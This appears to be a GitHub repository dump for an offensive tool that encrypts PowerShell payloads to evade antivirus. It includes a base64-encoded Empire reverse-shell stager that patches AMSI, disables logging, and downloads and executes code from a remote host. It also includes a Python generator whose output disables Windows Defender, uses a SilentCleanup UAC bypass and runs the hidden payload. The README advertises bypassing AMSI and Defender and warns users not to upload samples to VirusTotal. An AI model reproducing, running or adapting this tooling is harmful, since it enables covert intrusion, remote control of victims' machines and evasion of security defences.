├── empire_fernet_ps.png ├── README.md ├── empirepay.ps1 └── pspyfernet_obs.py /empire_fernet_ps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1captainnemo1/Powershell_Fernet_Obfuscator/HEAD/empire_fernet_ps.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Powershell_Fernet_Obfuscator 2 | A python Code to obfuscate any non-fud Powershell payload and generate a ready to use FUD Python executable script 3 | 4 |

Powershell_Fernet_Obfuscator

5 | 6 |

This is a tool to Obfuscate any existing powershell non fud payload(empire,unicorn,SET PS vector) and , in the process will create a FUD python ready to use script 7 | that can be used to perform different tasks.

8 | 9 |

In this Example I have shown how a non Fud Empire PS payload reverse shell , can be obfuscated to bypass AMSI.dll check and evade Windows defender .

10 |

Virustotal detection results : https://www.virustotal.com/gui/file/8b9ec6a026f49d4db1d89f6f5060857eb335a8decbd04642a13c28220600aac3/detection

11 | 12 |

Please do not upload to virus total.

13 | 14 |

Usage : python pspyfernet_obs.py nonfudpspayload.ps1

15 | 16 |

This Will generate the FUD payload.

17 | 18 |

Watch The Youtube Video for Clarification

19 | 20 | 21 | to_video 22 | 23 | -------------------------------------------------------------------------------- /empirepay.ps1: -------------------------------------------------------------------------------- 1 | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBpAE8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AQQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBzAEUAbQBiAGwAWQAuAEcAZQB0AFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAGkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATAB1AEUAKAAkAG4AVQBMAGwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBMAD0AWwBDAE8ATABMAEUAQwBUAGkAbwBuAFMALgBHAEUAbgBFAFIAaQBjAC4ARABJAGMAdABpAE8ATgBhAFIAeQBbAFMAdAByAGkAbgBnACwAUwB5AHMAVABFAE0ALgBPAGIASgBlAEMAdABdAF0AOgA6AE4ARQB3ACgAKQA7ACQAdgBBAGwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBhAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAYwByAGkAcAB0AEIAbABPAGMASwBdAC4AIgBHAEUAVABGAGkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAVQBFACgAJABuAHUAbABsACwAKABOAEUAVwAtAE8AQgBqAEUAQwB0ACAAQwBvAEwATABlAGMAdABpAG8ATgBTAC4ARwBlAG4AZQByAGkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAUgBpAE4AZwBdACkAKQB9AFsAUgBFAGYAXQAuAEEAcwBTAGUAbQBiAEwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAEUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAEEAbAB1AEUAKAAkAG4AVQBMAEwALAAkAFQAcgB1AGUAKQB9ADsAfQA7AFsAUwB5AFMAdABFAG0ALgBOAEUAVAAuAFMAZQBSAHYAaQBjAEUAUABvAGkATgBUAE0AQQBOAGEAZwBlAFIAXQA6ADoARQB4AFAAZQBDAHQAMQAwADAAQwBvAE4AdABJAE4AVQBFAD0AMAA7ACQAdwBDAD0ATgBlAFcALQBPAEIAagBFAGMAVAAgAFMAeQBzAFQARQBNAC4ATgBlAHQALgBXAEUAYgBDAGwASQBlAG4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgARQBhAGQARQByAFMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAUgBPAFgAeQA9AFsAUwB5AHMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAFUARQBTAFQAXQA6ADoARABlAEYAQQB1AEwAdABXAEUAYgBQAHIAbwBYAFkAOwAkAFcAYwAuAFAAUgBvAFgAWQAuAEMAUgBlAGQAZQBuAHQASQBhAEwAUwAgAD0AIABbAFMAWQBTAHQARQBtAC4ATgBFAHQALgBDAFIARQBEAGUAbgB0AEkAQQBMAEMAYQBDAGgAZQBdADoAOgBEAGUARgBBAFUAbAB0AE4AZQBUAFcATwByAGsAQwBSAEUAZABFAG4AVABJAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAVABlAE0ALgBUAEUAeABUAC4ARQBuAEMATwBkAEkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQBUAGUAUwAoACcAZQA1ADgANwBmADYAMQA0ADYAZQBiAGYAYgBkAGUAZgBkAGMAMAAyADgAYwA1ADkAMQA2ADQAMwBmADIAMgAwACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgA1AC4AMQA5ADUAOgA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAHcAQwAuAEgAZQBBAEQARQBSAFMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAHMAcwBpAG8AbgA9AG4AKwBXAEMAVwBsAFgAQgBLAEcAdABoADMAaQB2AFIAWQBxAEoARwBGACsAawBGAEQAUQBvAD0AIgApADsAJABkAEEAVABBAD0AJABXAEMALgBEAG8AdwBOAEwAbwBBAGQARABhAHQAQQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABEAEEAdABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABEAEEAVABhAFsANAAuAC4AJABkAEEAVABhAC4AbABlAG4ARwBUAGgAXQA7AC0ASgBPAEkATgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= 2 | -------------------------------------------------------------------------------- /pspyfernet_obs.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #@Author :#Captain_Nemo 4 | 5 | from cryptography.fernet import Fernet 6 | import os 7 | import sys 8 | import random 9 | import time 10 | import subprocess 11 | 12 | class bcolors: 13 | BLUE = '\033[94m' 14 | GREEN = '\033[92m' 15 | WARNING = '\033[93m' 16 | WHITE = '\033[97m' 17 | ERROR = '\033[91m' 18 | ENDC = '\033[0m' 19 | BOLD = '\033[1m' 20 | UNDERLINE = '\033[4m' 21 | 22 | 23 | with open(sys.argv[1], 'r+') as f: 24 | contents = f.read() 25 | banner = ''' 26 | █████████████████████████████ 27 | █████████████████████████████ 28 | ████ ▄▄▄▄▄ █ ▄ █ █ ▄▄▄▄▄ ████ 29 | ████ █ █ █ ▀▀ ██ █ █ ████ 30 | ████ █▄▄▄█ █▀▀█▀ █ █▄▄▄█ ████ 31 | ████▄▄▄▄▄▄▄█▄▀ █▄█▄▄▄▄▄▄▄████ 32 | ████▄ █▀▄ ▄██▄██▄██▄▀▄▄▄ ████ 33 | ████▀▀▄▄▀ ▄▀▀ █▀█ █▀▀▀▀████ 34 | ████████▄▄▄▄▀█▀█ ▄ ▀█ █████ 35 | ████ ▄▄▄▄▄ █▀▄▄ █▀█▀ ▀█▄████ 36 | ████ █ █ █▄█▀ ▄▀▄█▀▀▀ ▀████ 37 | ████ █▄▄▄█ █▀▄█ ▄█ █▄▄▀█▀████ 38 | ████▄▄▄▄▄▄▄█▄▄▄███▄██▄█▄▄████ 39 | █████████████████████████████ 40 | █████████████████████████████ 41 | 42 | ''' 43 | print banner.decode('utf-8') 44 | 45 | print bcolors.BOLD + bcolors.WHITE + " [+] Author :#Captain_Nemo" 46 | print bcolors.BOLD + bcolors.WHITE + " [+] HACK-ATHON BOOK OF WISDOM " 47 | print bcolors.BOLD + bcolors.WHITE + " [+] YOUTUBE CHANNEL : https://www.youtube.com/channel/UCA1eZ38TvjtyhpLtcZ9UHEQ" 48 | print bcolors.BOLD + bcolors.WHITE + " [+] FACEBOOK : https://www.facebook.com/Hack-Athon-BOOK-of-Wisdom-1258144607678680" 49 | print bcolors.BOLD + bcolors.WHITE + " [+] TWITTER : https://twitter.com/AthonOf" 50 | print bcolors.BOLD + bcolors.WHITE + " [+] GITHUB : https://github.com/1captainnemo1" 51 | 52 | #time.sleep(3) 53 | 54 | print "\n\n\n" 55 | 56 | print bcolors.BOLD + bcolors.WHITE + "[+] This Module will attempt to Obfuscate powershell Attack Vectors" 57 | 58 | print bcolors.BLUE + "[+] Raw payload" 59 | print " =============================================================================================" 60 | print contents 61 | print " =============================================================================================" 62 | print bcolors.ERROR + bcolors.BOLD + "[+] Generating Fernet MultiKey" 63 | key = Fernet.generate_key() 64 | print bcolors.BOLD + bcolors.WHITE + "[+] Key = " + key 65 | print bcolors.WHITE + "[+] Please make note of the Key for decryption" 66 | 67 | print bcolors.BOLD + "[+] Generating Fernet Object....please wait" 68 | f = Fernet(key) 69 | print bcolors.BOLD + bcolors.WHITE + "[+] Fernet Object Generated at :" 70 | print f 71 | print bcolors.ERROR + bcolors.BOLD + "[+] Encrypting Payload" 72 | time.sleep(2) 73 | print bcolors.BOLD + bcolors.WHITE + "=================================================================================" 74 | enc_payload = f.encrypt(contents) 75 | print bcolors.BOLD + bcolors.WHITE + "[+] Encrypted Payload : " + enc_payload 76 | print bcolors.BOLD + bcolors.WHITE + "=================================================================================" 77 | 78 | print bcolors.ERROR + bcolors.BOLD + "[+] Writing RAW payload to file, Please wait" 79 | Filename = "_PSRawPayload%i"%random.randint(1,10000000001)+".txt" 80 | #print Filename # bookmark 81 | 82 | f1 = open("_PSRawPayload%i"%random.randint(1,10000000001)+".txt", "a") 83 | f1.write(enc_payload) 84 | f1.close() 85 | 86 | print bcolors.BOLD + bcolors.WHITE + "[+] Raw Encrypted Payload written to :" + f1.name 87 | 88 | print bcolors.BLUE + bcolors.BOLD + "[+] Do You want to continue generating the Executable payload (Y/N)" 89 | decision = str(raw_input("enter Y or N\n")) 90 | 91 | if decision == 'N': 92 | print bcolors.BOLD + bcolors.WHITE + "[+] Have a nice day !!" 93 | print bcolors.BOLD + bcolors.WHITE + "[+] DO NOT UPLOAD TO VIRUSTOTAL !!!" 94 | sys.exit(0) 95 | elif decision == 'Y': 96 | 97 | # Create final Obfuscated Executable Python payload 98 | print bcolors.BOLD + bcolors.WHITE + "[+] Generating Final Obfuscated python Payload, Please wait" 99 | time.sleep(2) 100 | final_payload = open("PSFinalPayload%i"%random.randint(1,10000000001)+".py", "w") 101 | final_payload.write(""" 102 | from cryptography.fernet import Fernet 103 | import os 104 | import sys 105 | import subprocess 106 | import time 107 | 108 | key = """ + "\'"+key+"\'") 109 | final_payload.write(""" 110 | f_obj= Fernet(key) 111 | enc_pay =""" "\'"+enc_payload+"\'") 112 | final_payload.write(""" 113 | 114 | #Disable Notification 115 | 116 | #subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}]) 117 | 118 | #subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}]) 119 | #time.sleep(20) 120 | 121 | #Disable AV 122 | subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}']) 123 | 124 | time.sleep(90) 125 | 126 | subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', f_obj.decrypt(enc_pay).decode()]) 127 | 128 | time.sleep(90) 129 | 130 | #Enable AV 131 | subprocess.Popen(['powershell.exe', '-NoProfile', '-Command', 'if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")){Set-MpPreference -DisableIntrusionPreventionSystem $false -DisableIOAVProtection $false -DisableRealtimeMonitoring $false -DisableScriptScanning $false}else{$registryPath = "HKCU:\Environment";$Name = "windir" ;$Value = "powershell -ep bypass -w h $PSCommandPath";Set-ItemProperty -Path $registryPath -Name $name -Value $Value;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null ; Remove-ItemProperty -Path $registryPath -Name $name}']) 132 | 133 | #Enable notification 134 | 135 | #subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HKCU:\Software\Policies\Microsoft\Windows\Explorer -Name DisableNotificationCenter -Type #DWord -Value 0 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-#ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}]) 136 | 137 | #subprocess.Popen(['powershell.exe', '-NoProfile', '-Command',"if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -#match "S-1-5-32-544")){Set-ItemProperty -Path HCKU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications -Name ToastEnabled -#Type DWord -Value 1 } else {$registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" #Set-ItemProperty -Path $registryPath -Name $name -Value $Value schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-#Null Remove-ItemProperty -Path $registryPath -Name $name"}]) 138 | 139 | """) 140 | final_payload.close() 141 | print bcolors.BOLD + bcolors.WHITE + "[+] Final Encrypted encrypted Powershell Python Payload written to : " + final_payload.name 142 | print bcolors.BLUE + bcolors.BOLD + "[+] HACK THE MULTIVERSE " 143 | decr = 5 144 | while True: 145 | print bcolors.ERROR + bcolors.BOLD + "[+] DO NOT UPLOAD TO VIRUSTOTAL" 146 | decr = decr-1 147 | if(decr <=0): 148 | break 149 | sys.exit(0) 150 | else: 151 | sys.exit(0) 152 | print bcolors.ERROR + bcolors.BOLD + "[+] Respond in Y or N ONLY" 153 | sys.exit(0) 154 | --------------------------------------------------------------------------------